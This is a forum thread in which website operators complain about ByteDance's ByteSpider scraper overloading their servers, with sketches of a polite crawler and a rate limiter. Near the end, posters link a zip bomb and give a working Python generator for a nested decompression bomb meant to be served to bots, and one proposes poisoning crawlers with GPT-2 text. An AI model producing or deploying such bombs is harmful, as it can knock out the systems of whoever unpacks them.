[–] jagged_circle@feddit.nl -2 points 1 day ago* (last edited 1 day ago) (5 children)

This is fine. I support archiving the Internet.

It kinda drives me crazy how normalized anti-scraping rhetoric is. There is nothing wrong with (rate-limited) scraping.

The only bots we need to worry about are the ones that POST, not the ones that GET.
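
For what it's worth, "rate limited" doesn't take much. A minimal sketch of a polite crawler, assuming a hypothetical bot identity and an arbitrary delay, that also checks robots.txt before fetching anything:

```python
import time
import urllib.request
import urllib.robotparser

USER_AGENT = "ArchiveBot/1.0 (+https://example.org/bot)"  # hypothetical bot identity
DEFAULT_DELAY = 5  # seconds between requests; arbitrary politeness value

def polite_fetch(site_root, urls):
    # Honour robots.txt before touching anything else on the site
    rp = urllib.robotparser.RobotFileParser(site_root + "/robots.txt")
    rp.read()
    delay = rp.crawl_delay(USER_AGENT) or DEFAULT_DELAY

    for url in urls:
        if not rp.can_fetch(USER_AGENT, url):
            continue  # the site opted this path out; skip it
        req = urllib.request.Request(url, headers={"User-Agent": USER_AGENT})
        with urllib.request.urlopen(req) as resp:
            yield url, resp.read()
        time.sleep(delay)  # one request every `delay` seconds, not a firehose
```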

[–] Olgratin_Magmatoe@lemmy.world 2 points 6 hours ago

GET requests can still overload a system.

[–] purrtastic@lemmy.nz 37 points 22 hours ago (1 children)

It’s not fine. They are not archiving the internet.

I had to ban their user agent after very aggressive scraping that would have taken down our servers. Fuck this shitty behaviour.

[–] Melvin_Ferd@lemmy.world 4 points 22 hours ago (1 children)

Isn't there a way to limit requests so that the traffic isn't bringing down your servers?

[–] Mojave@lemmy.world 10 points 20 hours ago

They obfuscate their traffic by randomizing user agents, so it's either add a global rate limit or let them ass fuck you.
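
If it helps, that kind of rate limit is mostly just bookkeeping. A rough sketch, assuming you key on client IP (since the user agent is useless here) and with entirely arbitrary numbers:

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # arbitrary sliding window
MAX_REQUESTS = 120    # arbitrary per-client budget inside that window

_hits = defaultdict(deque)  # client IP -> timestamps of recent requests

def allow_request(client_ip: str) -> bool:
    """Return False once a client exceeds its budget for the current window."""
    now = time.monotonic()
    hits = _hits[client_ip]
    # Drop timestamps that have aged out of the window
    while hits and now - hits[0] > WINDOW_SECONDS:
        hits.popleft()
    if len(hits) >= MAX_REQUESTS:
        return False  # over budget: reject, delay, or tarpit
    hits.append(now)
    return True
```

The same idea with a single shared bucket gives you a true global cap; per-IP is the usual compromise so normal visitors aren't punished for the scraper's traffic.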

[–] Max_P@lemmy.max-p.me 40 points 1 day ago (1 children)

I had to block ByteSpider at work because it can't even parse HTML correctly, just hammers the same page, and sometimes accounts for 80% of the traffic hitting a customer's site, taking it down.

The big problem with AI scrapers is that, unlike Google and traditional search engines, they scrape so aggressively. Even if it's all GETs, they hit years-old content that's not cached and use up the majority of the CPU time on the web servers.

Scraping is okay; using up a whole 8 vCPU instance for days to feed AI models is not. They even actively use dozens of IPs to bypass the rate limits, so they're basically DDoS'ing whoever they scrape with no fucks given. I've been woken up by the pager way too often due to ByteSpider.

My next step is rewriting all the content with GPT-2 and serving it to bots so their models collapse.

[–] jagged_circle@feddit.nl 7 points 21 hours ago (1 children)

I think a common nginx config is to just redirect malicious bots to some well-cached terabyte file. I think Hetzner hosts one, iirc.

[–] SomethingBurger@jlai.lu 10 points 21 hours ago

https://github.com/iamtraction/ZOD

A 42 kB ZIP file that decompresses to 4.5 PB.
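
For anyone wondering how a file that small can expand that far: the linked bombs use a cleverer layout than this, but the basic ingredients are that deflate shrinks long runs of identical bytes to almost nothing and that nesting multiplies the damage on recursive extraction. A toy sketch (sizes kept deliberately small, all numbers arbitrary):

```python
import io
import zipfile

CORE_SIZE = 10 * 1024 * 1024  # 10 MiB of zeros at the innermost level
COPIES = 10                   # fan-out per nesting level
LEVELS = 4                    # nesting depth

def nested_zip_bomb(path="bomb.zip"):
    # Zeros compress to almost nothing under deflate
    payload, name = b"\0" * CORE_SIZE, "core.bin"
    for level in range(LEVELS):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            for i in range(COPIES):
                zf.writestr(f"{level}_{i}_{name}", payload)
        payload, name = buf.getvalue(), f"level{level}.zip"
    with open(path, "wb") as f:
        f.write(payload)
    # Fully recursive extraction yields COPIES ** LEVELS * CORE_SIZE bytes
    # (10**4 * 10 MiB, roughly 100 GB) from a file a tiny fraction of that size.

if __name__ == "__main__":
    nested_zip_bomb()
```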

[–] Ghostalmedia@lemmy.world 37 points 1 day ago

ByteDance ain’t looking to build an archival tool. This is to train gen AI models.

[–] zod000@lemmy.ml 24 points 1 day ago (1 children)

Bullshit. This bot doesn't identify itself as a bot and doesn't rate limit itself to anything close to an appropriate amount. We were seeing more traffic from this thing than from all other crawlers combined.

[–] jagged_circle@feddit.nl 3 points 21 hours ago* (last edited 16 hours ago) (2 children)

Not rate limiting is bad. Hate them because of that, not because they're a bot.

Some bots are nice

[–] zod000@lemmy.ml 1 points 6 hours ago

I don't hate all bots; I hate this bot specifically because:

  • they intentionally hide that they are a bot to evade our, and everyone else's, methods of restricting which bots we allow and how much activity we allow;
  • they do not respect robots.txt;
  • the already mentioned lack of rate limiting.

[–] Zangoose@lemmy.world 1 points 8 hours ago

Even if they were rate limiting, they're still just using the bot to train an AI. If it's from a company, there's a 99% chance the bot is bad. I'm leaving 1% for whatever the Internet Archive (are they even a company tho?) is doing.